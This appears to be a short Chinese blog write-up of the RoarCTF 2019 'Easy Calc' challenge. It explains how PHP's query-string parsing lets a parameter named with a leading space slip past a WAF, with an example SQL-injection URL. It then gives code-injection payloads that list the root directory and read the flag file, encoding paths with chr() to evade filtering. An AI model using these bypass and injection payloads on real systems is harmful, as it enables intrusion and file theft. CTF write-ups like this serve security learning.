[RoarCTF 2019]Easy Calc

# 1. 知识点

1.1PHP 的字符串解析特性

这是别人对 PHP 字符串解析漏洞的理解,
我们知道 PHP 将查询字符串(在 URL 或正文中)转换为内部_GET或的关联数组\_GET或的关联数组_POST。例如:/?foo=bar 变成 Array ([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news [id%00=42 会转换为 Array ([news_id] => 42)。如果一个 IDS/IPS 或 WAF 中有一条规则是当 news_id 参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:

/news.php?%20news[id%00=42"+AND+1=0–

上述 PHP 语句的参数 %20news [id%00 的值将存储到 $_GET [“news_id”] 中。

PHP 需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

1.删除空白符

2.将某些字符转换为下划线(包括空格和 .)

# 2. 解题过程

# 2.1 scandir()

calc.php? num=1;var_dump(scandir(chr(47)))

# 2.2 file_get_contents()

calc.php? num=1;print(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝